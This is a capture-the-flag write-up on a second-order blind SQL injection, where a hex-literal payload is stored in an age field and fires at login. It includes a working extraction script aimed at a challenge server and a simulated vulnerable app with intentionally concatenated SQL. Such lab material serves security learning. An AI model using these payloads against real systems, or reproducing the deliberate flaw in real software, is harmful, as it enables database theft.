
    Three hit

    Once inside there are very few features, which suggests a second-order injection. The username field is restricted by a regex, so the next candidate is age, which has to be an integer; that check can be bypassed by sending the value as a MySQL hex literal (0x...), which passes as a number but is stored as the decoded string. After some testing it turned out to be a blind injection: the payload stored in age is only evaluated when the account logs in, and the login page reveals whether the condition held.


    I found a script and adapted it:

    import requests
    import binascii
    
    url_register = "http://39.107.32.29:10000/index.php?func=register"
    url_login = "http://39.107.32.29:10000/index.php?func=login"
    result = '[*]result:'
    for i in range(1, 65):                 # flag position; the flag is assumed to be at most 64 chars
        found = False
        for j in range(32, 127):           # printable ASCII candidates for this position
            # Boolean condition on the i-th character of the flag. It is stored in the
            # age column at registration and only evaluated when the account logs in
            # (second-order injection).
            age = "1223 or ascii(substr((select flag from flag limit 1),{0},1))={1}#".format(str(i), str(j))
            # Send it as a MySQL 0x... hex literal: the submitted value looks numeric,
            # but MySQL stores the decoded payload string.
            age = binascii.hexlify(bytes(age, 'utf8'))
            age = "0x" + str(age, "utf8")
            # A fresh username per probe, since every probe needs its own registration.
            username = "pupiles{0}{1}".format(str(i), str(j))
            data = {
                "username": username,
                "password": "123456",
                "age": age
            }
            while True:                    # retry until the request goes through
                try:
                    resp1 = requests.post(url=url_register, data=data, allow_redirects=False)
                    break
                except Exception:
                    continue
            while True:
                try:
                    resp2 = requests.post(url=url_login, data=data, allow_redirects=True)
                    # The login page contains "<a>123</a>" only when the injected condition was true
                    if "<a>123</a>" in resp2.text:
                        result += chr(j)
                        print(result)
                        found = True
                    break
                except Exception:
                    continue
            if found:
                break                      # character recovered; move on to the next position

    The blind injection recovers the flag.
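    As an added illustration (not part of the original writeup), the following Python models the register-then-login flow described above: a parameterized INSERT that stores the payload harmlessly, a login query that concatenates the stored age and so fires it, and a boolean oracle built on the same substr() payload shape. SQLite stands in for MySQL, so unicode() replaces ascii() and the 0x... hex literal is only shown as an encoding step (SQLite does not decode it into a string). The table and column names, the username regex, the flag value and the probe usernames are all constructed assumptions. It also goes beyond the script above by binary-searching each character code, which needs 7 probes per position instead of up to 95.

```python
import binascii
import re
import sqlite3

# Constructed flag for this local simulation; not the challenge's flag.
FLAG = "flag{second_order_blind}"

# Assumed stand-in for the target's username regex (the writeup only says one exists).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]+$")


def to_hex_literal(payload: str) -> str:
    """Encode a payload the way the writeup's script sends the age field.

    In string context MySQL reads 0x... as the decoded bytes, so the stored
    age is the original payload, while the submitted value contains only
    [0-9a-fx] characters.  SQLite does not do this, so the simulation below
    stores the raw payload instead.
    """
    return "0x" + binascii.hexlify(payload.encode("utf8")).decode("ascii")


class VulnApp:
    """Toy register/login app with a second-order SQL injection (constructed).

    register() uses a parameterized INSERT, so nothing fires there; login()
    later trusts the stored age and concatenates it into a new query, which
    is where the payload runs.
    """

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users (username TEXT, password TEXT, age TEXT)")
        self.db.execute("CREATE TABLE flag (flag TEXT)")
        self.db.execute("INSERT INTO flag VALUES (?)", (FLAG,))

    def register(self, username: str, password: str, age: str) -> None:
        if not USERNAME_RE.match(username):
            raise ValueError("username rejected by regex")
        # Safe at this point: the payload is stored verbatim, not executed.
        self.db.execute("INSERT INTO users VALUES (?, ?, ?)", (username, password, age))

    def login(self, username: str, password: str) -> bool:
        row = self.db.execute(
            "SELECT age FROM users WHERE username=? AND password=?", (username, password)
        ).fetchone()
        if row is None:
            return False
        # Second-order flaw: the stored age is trusted and concatenated into SQL.
        hit = self.db.execute(
            "SELECT 1 FROM users WHERE username=? AND age=" + row[0], (username,)
        ).fetchone()
        return hit is not None


def probe(app: VulnApp, pos: int, threshold: int) -> bool:
    """One boolean oracle query: is the code of the pos-th flag char > threshold?

    Mirrors the script's payload shape; unicode() is SQLite's ascii(), and the
    trailing '#' is not needed because age is the last term of the query.
    """
    payload = (
        "1223 or unicode(substr((select flag from flag limit 1),{0},1))>{1}"
        .format(pos, threshold)
    )
    username = "probe{0}_{1}".format(pos, threshold)  # one fresh account per probe
    app.register(username, "123456", payload)
    return app.login(username, "123456")


def extract_flag(app: VulnApp, max_len: int = 64) -> str:
    """Recover the flag with a binary search on each character code."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if probe(app, pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr() past the end gives NULL, every probe is false: flag complete
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    print(to_hex_literal("1223 or 1=1#"))
    print(extract_flag(VulnApp()))
```

    The end-of-flag check matters for the real target too: once substr() runs past the last character no candidate matches, so the scan can stop instead of burning the remaining positions.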

    This article was first published on 網安wangan.com.
